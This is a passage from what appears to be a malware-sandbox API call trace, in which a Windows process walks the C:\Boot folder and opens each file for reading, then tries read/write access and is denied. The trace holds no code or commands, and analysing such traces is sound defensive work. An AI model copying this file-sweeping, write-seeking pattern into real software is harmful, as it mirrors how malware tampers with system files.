lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 28 [0083.372] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x38) returned 0x78350 [0083.372] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88798, cbMultiByte=-1, lpWideCharStr=0x78350, cchWideChar=28 | out: lpWideCharStr="C:\\Boot\\Fonts\\wgl4_boot.ttf") returned 28 [0083.372] CreateFileW (lpFileName="C:\\Boot\\Fonts\\wgl4_boot.ttf" (normalized: "c:\\boot\\fonts\\wgl4_boot.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x340 [0083.372] GetFileType (hFile=0x340) returned 0x1 [0083.372] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x78350 | out: hHeap=0x20000) returned 1 [0083.372] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0083.372] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0083.372] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0083.372] CloseHandle (hObject=0x340) returned 1 [0083.373] AreFileApisANSI () returned 1 [0083.373] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88798, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 28 [0083.373] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x38) returned 0x78190 [0083.373] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88798, cbMultiByte=-1, lpWideCharStr=0x78190, cchWideChar=28 | out: lpWideCharStr="C:\\Boot\\Fonts\\wgl4_boot.ttf") returned 28 [0083.373] CreateFileW (lpFileName="C:\\Boot\\Fonts\\wgl4_boot.ttf" (normalized: "c:\\boot\\fonts\\wgl4_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.373] GetLastError () returned 0x5 [0083.373] GetLastError () returned 0x5 [0083.373] SetLastError (dwErrCode=0x5) [0083.373] GetLastError () returned 0x5 [0083.373] SetLastError (dwErrCode=0x5) [0083.373] GetLastError () returned 0x5 [0083.373] SetLastError (dwErrCode=0x5) [0083.373] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x78190 | out: hHeap=0x20000) returned 1 [0083.373] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0083.373] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0083.373] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0083.373] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.373] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.373] FindNextFileW (in: hFindFile=0x78750, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x327f510, ftCreationTime.dwHighDateTime=0x36, ftLastAccessTime.dwLowDateTime=0x327f498, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x533c0, ftLastWriteTime.dwHighDateTime=0x327f288, nFileSizeHigh=0x36, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="", cAlternateFileName="渘Ĉ㪀ā湈Ĉ蘿̧뿃")) returned 0 [0083.373] FindClose (in: hFindFile=0x78750 | out: hFindFile=0x78750) returned 1 [0083.373] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0083.373] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0083.373] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0083.373] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0083.374] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0083.374] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0083.374] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0083.374] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0083.374] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0083.374] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46438 | out: hHeap=0x20000) returned 1 [0083.374] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0083.374] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0083.374] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0083.374] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0083.374] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0083.374] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0083.374] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0083.374] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0083.374] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0083.374] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0083.374] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0083.374] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.374] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.374] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.374] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.374] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0083.374] AreFileApisANSI () returned 1 [0083.374] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\fr-CA", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\fr-CA", lpUsedDefaultChar=0x0) returned 14 [0083.374] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.374] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.374] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0083.374] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0083.374] AreFileApisANSI () returned 1 [0083.374] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0083.375] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1c) returned 0x88748 [0083.375] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x88748, cchWideChar=14 | out: lpWideCharStr="C:\\Boot\\fr-CA") returned 14 [0083.375] CreateFileW (lpFileName="C:\\Boot\\fr-CA" (normalized: "c:\\boot\\fr-ca"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.375] GetLastError () returned 0x5 [0083.375] GetLastError () returned 0x5 [0083.375] SetLastError (dwErrCode=0x5) [0083.375] GetLastError () returned 0x5 [0083.375] SetLastError (dwErrCode=0x5) [0083.375] GetLastError () returned 0x5 [0083.375] SetLastError (dwErrCode=0x5) [0083.375] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0083.375] AreFileApisANSI () returned 1 [0083.375] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0083.375] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1c) returned 0x88658 [0083.375] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x88658, cchWideChar=14 | out: lpWideCharStr="C:\\Boot\\fr-CA") returned 14 [0083.375] CreateFileW (lpFileName="C:\\Boot\\fr-CA" (normalized: "c:\\boot\\fr-ca"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.375] GetLastError () returned 0x5 [0083.375] GetLastError () returned 0x5 [0083.375] SetLastError (dwErrCode=0x5) [0083.375] GetLastError () returned 0x5 [0083.375] SetLastError (dwErrCode=0x5) [0083.375] GetLastError () returned 0x5 [0083.375] SetLastError (dwErrCode=0x5) [0083.376] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0083.376] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0083.376] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0083.376] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.376] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.376] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.376] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.376] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0083.376] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0083.376] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0083.376] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010bc12, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef5ade2b, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="fr-FR", cAlternateFileName="")) returned 1 [0083.376] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0083.376] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0083.376] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0083.376] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0083.376] FindFirstFileExW (in: lpFileName="C:\\Boot\\fr-CA\\*", fInfoLevelId=0x0, lpFindFileData=0x327efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x327efb8) returned 0x78110 [0083.376] FindNextFileW (in: hFindFile=0x78110, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc487a0b9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48a0490, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc48a0490, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0083.376] FindNextFileW (in: hFindFile=0x78110, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48a0490, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x209949ab, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x13560, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0083.376] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0083.376] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0083.376] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0083.376] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0083.376] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0083.376] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0083.376] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0083.376] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0083.376] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0083.376] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0083.377] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0083.377] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46518 [0083.377] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0083.377] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0083.377] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0083.377] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0083.377] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0083.377] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0083.377] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0083.377] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0083.377] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0083.377] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0083.377] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0083.377] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0083.377] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0083.377] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0083.377] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0083.377] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0083.377] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0083.377] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.377] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.377] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.377] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.377] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0083.377] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0083.377] AreFileApisANSI () returned 1 [0083.377] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\fr-CA\\bootmgr.exe.mui", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\fr-CA\\bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 30 [0083.377] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0083.377] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.377] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.377] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0083.377] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0083.378] AreFileApisANSI () returned 1 [0083.378] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x883b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0083.378] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x53640 [0083.378] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x883b0, cbMultiByte=-1, lpWideCharStr=0x53640, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\fr-CA\\bootmgr.exe.mui") returned 30 [0083.378] CreateFileW (lpFileName="C:\\Boot\\fr-CA\\bootmgr.exe.mui" (normalized: "c:\\boot\\fr-ca\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x340 [0083.378] GetFileType (hFile=0x340) returned 0x1 [0083.378] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0083.378] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0083.378] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0083.378] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0083.378] CloseHandle (hObject=0x340) returned 1 [0083.379] AreFileApisANSI () returned 1 [0083.379] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x883b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0083.379] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x534d8 [0083.379] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x883b0, cbMultiByte=-1, lpWideCharStr=0x534d8, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\fr-CA\\bootmgr.exe.mui") returned 30 [0083.379] CreateFileW (lpFileName="C:\\Boot\\fr-CA\\bootmgr.exe.mui" (normalized: "c:\\boot\\fr-ca\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.379] GetLastError () returned 0x5 [0083.379] GetLastError () returned 0x5 [0083.379] SetLastError (dwErrCode=0x5) [0083.379] GetLastError () returned 0x5 [0083.379] SetLastError (dwErrCode=0x5) [0083.379] GetLastError () returned 0x5 [0083.379] SetLastError (dwErrCode=0x5) [0083.379] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0083.379] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0083.379] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0083.379] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0083.379] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.379] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.379] FindNextFileW (in: hFindFile=0x78110, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x327f510, ftCreationTime.dwHighDateTime=0x3a, ftLastAccessTime.dwLowDateTime=0x327f498, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x68f48, ftLastWriteTime.dwHighDateTime=0x327f288, nFileSizeHigh=0x3a, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="", cAlternateFileName="渘Ĉ㪀ā湈Ĉ蘿̧㕠\x01⺊Ā")) returned 0 [0083.379] FindClose (in: hFindFile=0x78110 | out: hFindFile=0x78110) returned 1 [0083.379] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0083.379] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0083.380] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0083.380] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0083.380] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0083.380] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0083.380] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0083.380] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0083.380] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0083.380] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46518 | out: hHeap=0x20000) returned 1 [0083.380] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0083.380] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0083.380] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0083.380] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0083.380] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0083.380] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0083.380] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0083.380] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0083.380] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0083.380] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0083.380] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0083.380] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.380] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.380] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.380] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.380] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0083.380] AreFileApisANSI () returned 1 [0083.380] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\fr-FR", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\fr-FR", lpUsedDefaultChar=0x0) returned 14 [0083.380] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.380] 